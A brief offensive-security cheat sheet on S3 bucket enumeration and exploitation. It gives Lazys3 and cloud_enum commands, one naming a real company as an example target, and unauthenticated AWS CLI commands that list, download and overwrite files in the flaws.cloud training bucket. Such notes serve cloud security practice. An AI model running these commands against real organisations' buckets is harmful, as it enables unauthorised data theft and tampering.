S3 Bucket Enumeration

Lazys3 - Ruby Script

  • ruby lazys3.rb <company>

  • ruby lazys3.rb pakwheels


Cloud_enum

  • sudo apt install cloud-enum

  • cloud_enum -k [flaws.cloud](<http://flaws.cloud>) --disable-azure --disable-gcp


S3BucketList - Browser Extension

Manual Installation


Exploiting S3 UnAuthenticated

  • sudo apt-get install awscli

  • cloud_enum -k [flaws.cloud](<http://flaws.cloud>) --disable-azure --disable-gcp

  • aws s3 ls s3://flaws.cloud/ --no-sign-request

  • Download - aws s3 cp s3://flaws.cloud/secret.html ./ --no-sign-request

  • Upload - aws s3 cp ./index.html s3://flaws.cloud/secret.html --no-sign-request


Exploiting S3 Authenticated

  • Create a free AWS account

  • Go to AWS IAM dashboard

  • Users → Add New user with programmatic access credential type

  • Once user is created, note down the access key and secret access key

  • Click User → Permissions → Add permissions → Attach existing policies → AmazonS3FullAccess

  • aws configure --profile someone

  • aws s3 --profile someone ls s3://flaws.cloud/ --no-sign-request

  • aws s3 --profile someone cp s3://flaws.cloud/something.html ./

Last updated